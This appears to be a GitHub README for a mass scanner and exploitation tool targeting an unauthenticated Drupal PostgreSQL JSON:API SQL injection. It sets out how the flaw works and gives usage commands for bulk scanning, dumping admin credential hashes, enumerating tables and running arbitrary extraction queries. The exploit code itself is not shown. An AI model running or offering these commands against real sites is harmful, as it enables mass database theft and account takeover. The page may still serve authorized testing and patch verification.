Skip to content

ridhinva/drupal-jsonapi-sqli-scanner

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 

Repository files navigation

CVE-2026-9082 Critical CISA KEV Affected Versions License

CVE-2026-9082 — Drupal PostgreSQL SQL Injection

Mass Scanner & Exploitation Tool

Unauthenticated SQL Injection in Drupal Core (PostgreSQL)
JSON:API filter array key injection via PDO placeholder name abuse


Overview

CVE-2026-9082 is a Highly Critical SQL injection vulnerability in Drupal Core affecting all PostgreSQL-backed sites running Drupal 8.0 through 11.3.9. Added to the CISA Known Exploited Vulnerabilities (KEV) catalog on 2026-05-22 — actively exploited in the wild.

Impact

Severity CVSS Auth Required Attack Vector
Critical 9.8+ None HTTP (JSON:API)
  • Data exfiltration — extract databases, users, password hashes
  • Privilege escalation — create admin accounts, modify content
  • Remote code execution — in some configurations via pg_exec() or COPY ... PROGRAM

Affected Versions

Status Versions
❌ Vulnerable Drupal 8.0.0 → 11.3.9 (PostgreSQL backend)
✅ Fixed 11.3.10, 11.2.12, 10.6.9, 10.5.10

How It Works

The flaw exists in core/modules/pgsql/src/EntityQuery/Condition.php. The translateCondition() method uses user-controlled array keys from JSON:API filter parameters to construct PDO placeholder names. PDO only parses [a-zA-Z0-9_] as placeholder names, so any suffix after ) becomes literal SQL injected into the query.

JSON:API Filter → array key with SQL → PDO placeholder truncation → SQL injection

Features

  • Mass scanner — scan hundreds of targets concurrently
  • Single target mode — check individual Drupal sites
  • Time-based detectionpg_sleep() blind SQLi confirmation
  • Boolean-based detection — row count comparison
  • Version extraction — identify PostgreSQL version
  • Database info — extract current user and database name
  • Admin credential dump — username, email, password hash (uid=1)
  • Table listing — enumerate all public tables
  • Custom SQL queries — run any extraction query
  • Proxy support — route through Burp Suite or similar
  • Output to file — save mass scan results
  • Colored terminal output — easy to read results

Installation

Prerequisites

  • Python 3.8+
  • pip (Python package manager)

Install Dependencies

# Clone the repo
git clone https://github.com/ridhinva/CVE-2026-9082.git
cd CVE-2026-9082

# Install requirements
pip install requests

That's it! Only one dependency — requests.


Usage

🕵️ Check Single Target

python3 cve_2026_9082_scanner.py -u https://target.com --check

📡 Mass Scan Multiple Targets

python3 cve_2026_9082_scanner.py -f targets.txt

targets.txt format:

https://target1.com
target2.com
192.168.1.100

🔓 Extract PostgreSQL Version

python3 cve_2026_9082_scanner.py -u https://target.com --version

🗄️ Extract Database Info

python3 cve_2026_9082_scanner.py -u https://target.com --dbinfo

👤 Dump Admin Credentials (uid=1)

python3 cve_2026_9082_scanner.py -u https://target.com --admin

📋 List All Tables

python3 cve_2026_9082_scanner.py -u https://target.com --tables

💉 Custom SQL Query

python3 cve_2026_9082_scanner.py -u https://target.com --query "SELECT usename FROM pg_catalog.pg_user"

Save Results to File

python3 cve_2026_9082_scanner.py -f targets.txt -o results.txt

Use Proxy (Burp Suite)

python3 cve_2026_9082_scanner.py -u https://target.com --check --proxy http://127.0.0.1:8080

Customize Timing

# Increase sleep time for time-based detection (default: 5s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --delay 10

# Increase HTTP timeout for slow targets (default: 30s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --timeout 60

Command Reference

Flag Description
-u, --url Single target URL
-f, --file File with targets (one per line)
-o, --output Save scan results to file
--check Check if target is vulnerable
--version Extract PostgreSQL version
--dbinfo Extract DB user and database name
--admin Extract Drupal admin credentials (uid=1)
--tables List all database tables
--query Custom SQL extraction query
--threads Threads for mass scan (default: 20)
--timeout HTTP request timeout (default: 30s)
--delay pg_sleep delay for detection (default: 5s)
--no-ssl-verify Skip TLS certificate verification
--proxy HTTP proxy (e.g., http://127.0.0.1:8080)

Example Output

Vulnerable Target

╔══════════════════════════════════════════════════════════════╗
║          CVE-2026-9082 - Drupal PostgreSQL SQLi             ║
║       Mass Scanner + Exploitation Tool v1.0.0               ║
╚══════════════════════════════════════════════════════════════╝
  CISA KEV: Added 2026-05-22  |  Advisory: SA-CORE-2026-004

[*] Checking: https://vulnerable-drupal-site.com

[!!] VULNERABLE - https://vulnerable-drupal-site.com
      Method: time-based (+5.2s)
      Resource: node/article

Admin Credential Dump

[+] username: admin
[+] email: admin@example.com
[+] pass_hash: $S$E8gJ8yJ8...hashed_password...

References

Source Link
Drupal Advisory SA-CORE-2026-004
CISA KEV CVE-2026-9082
Patch Commit ea9524d9
NVD Entry CVE-2026-9082
Discoverer Michael Maturi

⚠️ Disclaimer

This tool is for authorized security testing, educational purposes, and ethical research only.

Unauthorized access to computer systems is illegal. The authors assume no liability and are not responsible for any misuse or damage caused by this program.


Author

Ridhin V A (@ridhinva) — Bug bounty hunter & security researcher

Built because CISA KEV said it's being exploited in the wild. Patch your Drupal sites.

About

Drupal PostgreSQL SQLi Scanner - Unauthenticated SQL Injection in Drupal Core via JSON:API (CISA KEV May 2026)

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages